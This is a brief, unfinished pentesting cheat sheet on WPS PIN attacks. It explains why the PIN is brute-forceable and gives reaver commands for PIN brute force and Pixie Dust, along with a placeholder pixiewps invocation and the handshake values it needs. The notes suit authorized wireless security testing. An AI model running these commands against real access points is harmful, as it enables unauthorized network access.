Skip to content

WPS

WPS (Wifi Protected Setup)

WPS is a convenient feature which allows users to connect devices to PSK networks without configuring the PSK on a client.
Typically, these were deployed as physical buttons which were depressed when a client wished to associate or PIN's.
The PIN option was defined as a mandatory requirement, although certain implementations and configurations deactivate it.
Attacks were developed against the space which the PIN could occupy, 10,000,000 possible combinations.

Bully

List of Vulnerable Devices

Reaver

Reaver

Get the initial information from Reaver
Generates Auto pin if biased on the BSSID for Zyxel, D-Link, and Belkin

REAVER:

reaver -i wlan1mon -c<chan#> -b <MACaddy> -vvv -K 1 

Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]

Pixewps

We need the
- PKE
- PKR
- e-hash 1
- e-hash 2
- E-nonce
- R-nonce
- authkey from Reaver to use for pixiewps. When using the -P (Pixiedust loop) option, Reaver goes into a loop mode that breaks the WPS protocol by not using M4 message to avoid lockouts. This option can only be used for PixieHash collecting to use with pixiewps.

Example:
TODO

pixiewps --pke ... --pkr ... --e-hash1 ... --e-hash2 ... --authkey ... --e-nonce ...